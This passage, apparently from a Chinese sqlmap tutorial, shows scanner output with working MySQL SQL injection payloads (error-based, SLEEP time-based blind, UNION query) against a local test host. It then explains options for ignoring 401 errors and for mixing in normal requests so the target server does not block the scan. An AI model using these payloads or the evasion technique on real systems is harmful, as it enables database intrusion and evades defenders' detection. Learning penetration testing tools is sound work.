    Payload: id=1' AND (SELECT 4185 FROM(SELECT COUNT(*),CONCAT(0x7176706b71,(SELECT (ELT(4185=4185,1))),0x71706a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'aqQg'='aqQg
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 4770 FROM (SELECT(SLEEP(5)))RbSZ) AND 'xahz'='xahz
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-9218' UNION ALL SELECT NULL,NULL,CONCAT(0x7176706b71,0x4e6a506169494f6c654a42614659426f70457a4f77454d4f494c415144525967626d41745067674a,0x71706a7871)-- -
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY]-- -
---
[20:08:09] [INFO] the back-end DBMS is MySQL
[20:08:09] [INFO] fetching banner
[20:08:09] [DEBUG] resuming configuration option 'string' ('Your')
[20:08:09] [DEBUG] performed 0 queries in 0.00 seconds
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[20:08:09] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'

[*] ending @ 20:08:09 /2020-02-26/


```ini
显然,此时id为7,是随机生成的。

## 7.sqlmap中设置忽略401
如果测试站点偶尔返回HTTP错误401,而你想忽略它并在不提供适当凭证的情况下继续测试,可以使用 **-\-ignore-401**来忽略未验证错误。

## 8.避免错误请求过多而被屏蔽
有时服务器检测到某个客户端错误请求过多会对其进行屏蔽,而Sqlmap的测试往往会产生大量错 误请求,为避免被屏蔽,可以时不时的产生几个正常请求以迷惑服务器。
参数:
- --safe-url
隔一会就访问一下的安全URL
- --safe-post
访问安全URL时携带的POST数据
- --safe-req
从文件中载入安全HTTP请求
- --safe-freq
每次测试请求之后都会访问一下的安全URL